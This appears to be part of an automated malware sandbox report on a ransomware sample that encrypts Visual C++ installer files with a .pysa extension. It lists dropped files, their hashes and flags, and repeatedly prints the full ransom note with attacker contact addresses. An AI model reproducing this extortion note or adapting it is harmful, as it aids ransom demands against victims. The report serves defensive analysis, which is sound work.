                  SHA-512:696625A5056965C408CAD7532AF009EC4151052DDD5D65581F765EDBEFCE1B83F241F568BEDB6ACE70CC53D30B49F3C3653E975E81F383A96B46F28562D9BC26
                  Malicious:true
                  Preview: UO.Jx.&.............g...N...... X b..?-..,?.'5*...y.o..K.<r.q../...........a.)..8.G...~U..)....6.7..9.\.xr.)....0!4......h..b..`r.'...s.. N.J!G..C.-...hhX.@.OK>....|....2_.......H8.'3.H...........\K...4.z0.g.^|.\.....9.c..TS.h.SG7...$]'..|ag.....v.....'.,1j.Ln...?........y.Z/..!i.`..b.f*...d...BEc..3`mha`V.j..I..Nz.....@Oz;..>,.Ei.V..a.....3.`].E......9.....JX.N...E...)g...>{.W.9ZO....;.(.9..E....M\d561AA........{p)..W.<..k....._70.#....E...b#..jbQ.p..+...K...+.!....#FXi_..r..r.u .o....G..."l.4.Je..%..n..i.{s+%hM2....u.~DD.n.u.. LR..rq..}...oxW..u.=...a.O......4R.mg.N...Q.>..VCq..xk.....a...(.>.s..=+...Qm1*.r.Z.^..a.~I.."..=[s~`.../3......RP...R..i...S...Z......|.7..[.5...vV ....U93.}[.m%0S.E....=.[..)..h..)......].o..Q...+&.........f..'......L`.... .h..b.......>.[U.z...8.S...R..+>.J...:m........F..`bF..*....>........_.M....-.QM1..G....lq...... ..a|,...c.)+*...07.......(..~.7~x>.I5z;.7...aD...`v.]su#W.2..{}h.3.i.b.n.t..5V..
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994444057630691
                  Encrypted:true
                  SSDEEP:3072:VQvRzLHNPHaft4WqwY5A8wVS+cDmlZennzRUyPOb/klPUB:VQBHhafpqeZkmGnzRU0ObyUB
                  MD5:E2F5EE60ECF9D9E0D2F5F4D7DC0AEBE7
                  SHA1:C7BB98ECF8D3879C53146F6CB088F31F1103EAEC
                  SHA-256:BBAB30972498BE0D188E29433658437922736C022F5D5332429B81F681F58BD1
                  SHA-512:CC8BB7C3D7FFA6414CFA2E38BA3B3975D33410D08BE3730F0722698D8E675CF609E7B2F95166A25A0D0DF4358C0C45E28AE93D5AE3C84351645D1E8B52D5F3A4
                  Malicious:true
                  Preview: ....~..b."%WP....3..!E$....O... ......l........._Z.I.<.*.....~7.hQ6....f.r...u...I.....m`../P...S)J..+..}N.....>.4..8....}.~....Y.w..].C...B.i*#._........%....f)h..E.kG...'gm?6J....7(..os..;5]Tz.l.<.@0..L...j.n..i;.0...I...5.....'.@..D)"UR.. .r.i6...V...O.....\.........5..gb "E.^._.;.l.a...3.>..E.k..xY........:Zb..<.q..s..@k8.....K.`.....PC.@2...U<.9nnr..TGH.Xj..Pv5n....B......g@.)j.s..A..JNV.w>.,G.].u....x.H!.1H.p..!?5....c..g...^zaK.....X..1.N.mW..ph<n~...1..x.?..)...m...Th(....u.m......eu.E...=.U-.`p.&{Z..E{...6..d. .yx....w.,....v..gQ....Y..N..n.m..*...!...ac#<.X...Ud...O.Y. ...5x.j.-...........B.+FWLL!N.<...kprjF...]-,._?.C._.8...E...........3w.|..F..U.=..........Y....k...%r....`....3.J..U.:..5..H.d.....]...K.I...'...n.im..J;..j.eY(..N...N..Z.+.CX.n..".e....w....9.u.t.a........`.>?{..Qp..\?.k?P..ug.p..)~...Rd....i.\F...*....q..*.q.@.*"#...|/!...4.-.C.1.Mc=P..7.d.]".:.U......<{.k..(...WR&{H........j.....n.W.`....e.T.Qn..........-...........
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5122048
                  Entropy (8bit):7.999960924661378
                  Encrypted:true
                  SSDEEP:98304:avTHGNHBEClrfXF/1iMqv31jWzbpkjHj5ZgMvdttBehDFfmxWQ0xfoSrj1:9P/sNv1Czlwlv5c5m/0xfow5
                  MD5:48C97444D5B5B573C2E88825C5ECC67C
                  SHA1:FD9DA9D6A896680EF904319411B73F7B6EDE4531
                  SHA-256:4F495AF2304527402B7D9B1D27CBB31D5CD75E4D3A29B863FBB011775B2A4E62
                  SHA-512:12C31779DBF5444DA571576F8785E50D5CF63ADB1122DAB55B90EE06866DBBE723A282C100BFB130D6DD7B30DB04A5C2458554005DFD5D7CC39F434F6DD1C6F0
                  Malicious:true
                  Preview: .B.E......8...Tn........T.`.......m.Q..Ro/.M..x=....}L.Z$p..y1..9h..\UL0..N.....o.].&..~.a&7.H.h..s#\..4.W.A!..!.9...W....^..&>..;(.`.@r....+.A:"}.0B...!~JEe.:u.\=l...?1..k1g.|1..i.i..$.w..........`|..t.....W&.w..Z.'.-....\.>N3.....2..g.x.....C@..8JF.].B......<..M.`.....f......m.qU.....'...!......2n6G..v]..U....+l..z{.d..~..ua...Lb......G....]&%.G;..YZp.:...D.W...6.^......J....bj,.@/..+...,.v......=....e..c...}.....p...U..n*..,.p?.l@9..1...*s9.qNi.j.....;v.....#..TOa.\.....Zt....Ps[....?..s..u%.Fg.....1$.....+..{.aY_z.........8.I.{*..W.m|f....`..Z_.I..E..1.1..g.....Wwa....Fg......a.~'W.`...w...&...1.:..[].O...Vb.........U.T.*b.CT....M..?....h./..St{.:...t....%A.-..a.s.I/.E.:.EH0T.`X%-.......t-l.A&..{.+.+..."...&..%..c..3..mi<..Vw../...Q.>.0..=..G.`.#....".a@..9...L..c.>h8....L.R<.T..3..4....<...+WA....0.Rlr....,.7..%......P.....z............r-.o.&..X.A.C.......j.^........R...O..:..{......|g....v................J0p....,+.>.&.-....u.
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9942709163809145
                  Encrypted:true
                  SSDEEP:3072:ZouiRWArlw73IytiQU1aGF+tx6wjOTlSA2O+cwGDgXoJ6UYJ:ZNAG73IwiQMYtxuAH575oJoJ
                  MD5:B1631A74AA677E5343BC0C792AF5C6DE
                  SHA1:97861ACA0B71E4B82E204928DB50B1C3DCF0F225
                  SHA-256:819832CCAE5869711E7F762D0C815834971DF6BB6073657CAE7C17D5759CA510
                  SHA-512:0F61F551547F5DCA15C155F3EC58AE0C7ACA277D770F197223EA474ADF0D684318E3FEE3ED91B83117295EEBEBF2685FF4F43C2E4129FA864F9E30B5ABAC3DB1
                  Malicious:true
                  Preview: wES.0..g.U`....3.....xY=.2.).....sf...%....Mr..3........t....J].w8.3=.........UD....%..M.&;$.g...4.(.B.......?.......[GED....VS.I.....@..Vh..~7).-..n..F.....M.!s9.6.....~......G..?.=......CY.P{@........N..s".Wp.$....sv..b.....V....&Vp0.g*..p..!.g.v(...[;..k.j.K...p...Z~..6s>+.x.2C..O)82.G..../....8..$.#aU.uls....R..v...|faz5..^..!..|.(]..7...A.7$.?..U.Wr...R..W.B...I.....1.~.c*.<.#[O7...2..g.#.. ..n...'...r:)...{....x.b.....Z..!p...O..P>.@D...H..K.d..yi..$IIkS..`.V.*.mk..8~.Y..Vy..0I.R^.I,...4.K..o!.a..;4.A..7....<...`L.......P...r..Aj.=.{f..i.2...G......T...n....HL..`.9.H6..!..eoX..R...&~'..KXd.?Z{G..[..YgG[.'.;s..0.H.....L.E.........S.!pk.U.t;%.>J.%.fH...k..CHU.!.V........?...{i....2q..}..].@.v.;.........56..6.../7.S.'.E.g.._g..o...........i.'l[..mY.v....-#".#...*.....2.6.........4.'...1t<..(.L1.n0`...*....wj.{....@w&..HX.....j...G.A.....\r.....2....3...*r..N.....O/..1.'...<.....`..nhK.....Y..@...q.5...,.....B@..c.2k!j...........n....].cmI
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):821248
                  Entropy (8bit):7.999644429375621
                  Encrypted:true
                  SSDEEP:24576:SAoGQn5dyWmgow7uNWDhVFbmME8VhE7XLgKex:SAo95/ow72o/jE867Xex
                  MD5:16194BA7F62D0275766412C40FB1C94E
                  SHA1:28FA72E4CC481B4A99ABF62AF912E135A0550D8D
                  SHA-256:0CED1B51B496A555FBD4A1C1FF8152CBED25774637708316C68C613538A1F176
                  SHA-512:AFE83058E93B73908B18D9169659FAFE777325CD88DD2B68C132678FC4AA020A80F9220C921CC4037A3027F965F64951C43B5705C9B49482B9ABE36A867DE42B
                  Malicious:true
                  Preview: +..5.sg.=o2.5.G!y...`..A^B...O..g...);........B'z...O.<.M(V[...k.efv7P(3sc..j.0...4........A.C...t)m3..#G.$&..{]k'..&...W..V...6C.|U.a"..z...xE,..A.._..)..=Q..#..i..5.O.(...$.....<u@-.b..njo...-.o......O.Y....k.d.(..j..-f?L.a.N.....|,.*..!...a.....\......}..A.zfhN0.....C......m..............f8.)."...o.b......r..%p.Us...lN.T35?.-g.-...-.9c2...9...~.......|V..2`..........D._....J=>a?8q.....:.w..g?._Q.....1.sX....g.b.1..>.D...Y2.C=a.g..6^p...0...n..?..!.>..-... .#...." @.@.,*...w....F....z..:..>.......S..W.%..4.i.@.v.Y..V......by... .......".<..".']...H..T....uS"..ro....0jq.Q..T..#^M*/b.b?Zy.......DG.U.DW.EA....w...%P..Cy.ll............)u.*.vQ. D....x..Y..Y./?u..z..+MI%.}r....=...n...r.I.FJr$.......Y..E_..W.cb}..f}..o....... q7...(....Q.........j.6.?....G........R..P.G..o..J.M......d...v.1.. ..F...5x.....'.k|.[.D:......8.0h..!9.af$...d8.Zd....T........pmb.....2.0.c.!j.q.B.m......;`.z?.b?+...C....jz.%...<..PUp......G..h.w..z.@..V.).........8.)S
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993741808928614
                  Encrypted:true
                  SSDEEP:3072:MgoQyHi6LlIRPRc8dXT6t93/tnUS1lhtkIILDC4aCora:vt+RIhRcmS5BUS1lhtQma
                  MD5:93A1E9DECF27A3B3840BC187FB8B384E
                  SHA1:A3A3A74EF5CFC24423D776793FDBDD18DC6A98B5
                  SHA-256:223A3C803D85BC3D83FC402F5B62D4F0EB8AA7D35BDE0F74B7FE86A3CAD919F9
                  SHA-512:87D6FD85A93D0EF8106887D45931FB3DB264A77DA095E4282FBD558C4A9851EA12EE5E9352F54E9A965C84758226496D4A5897409BDB1190F71AEC253BA479B4
                  Malicious:true
                  Preview: .....1...oZ....t,.I.<#...dB..*."..?..2..R...1......,....x...=..T....=..*'Em.M..K.....:w......q.J...H..#ugBr_....|9r.N...YMx..u..] ......0H..............g[....3.h.XO.....;....G.".|...=O.:..v.K.{(..1...l.......-.zu.t.$....7.v.//.rQ.J....}.....?...M.h`.E.&..4".....9...G.}6....XG,.C...7R...O.....M../.. .z_:..;i....NO..F...V....%.?.!..y.m...^....O.nlL.Z....>.-.......7..S.>..F...=v Z.,.O<}.;........3Q.V.......-.$..o...L.j.7.d.8.X=..y..4...7~Yr#...V..o:....G.]5.v.R+.P.u|....5.Y(......1..j.OJ[r..K.H.BB_........9..:E.8.fzhVzMS+.._k...7.i..}.k.JOj..?..2 ..d....,h.+f.....:.'.p%...F..1..g.j....(....!.6..e.}D#...a.........U....:"'..^."y.$.J.k...(. ..L....ISdsE.....Z ..n..Z.j.d....E ....L24.H....=6.A:.]Y...!....a.,.5.e..4~.Q.+..\..}....'ld...j}.@.....5)(d.."B...,.Q3|.t..L.z.S.@.k.[..*yVB..WHf..I.&.M..uyGJR..wb_.^...M.5...'..j..)..|.x[M#'..r.....+T.h....[='>.Z.....2...r..'.Lg/....<SF.....N...".<.]v..k..W.....+..L..5.^.*....IZ..FP..z..1.F..1.....Je.
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):718848
                  Entropy (8bit):7.999585886967448
                  Encrypted:true
                  SSDEEP:12288:d7+7mCO2F2jURkoPr7YDhv2eTxEGZxT6lziwCBi1X8/34a8:5gge7YFeelHZR6lWq8/34B
                  MD5:24B1007B6BE66BF58E21DECD09D1277B
                  SHA1:9B4D7B819870F589BB24A8CCB7A357A70B88AD9A
                  SHA-256:66FBAC4C0F4AC2A0C8904A9CDB6F093AAAA46379FB6F842546B2B330A7585F14
                  SHA-512:0734A1880085D743E4FBD346FAC92E8740B906D691127EF1A0A649A31AF2BA51276D8D320F64D04B5A40E9298B9D3FE00B9AA0F901E6CED69255465FEACF120E
                  Malicious:true
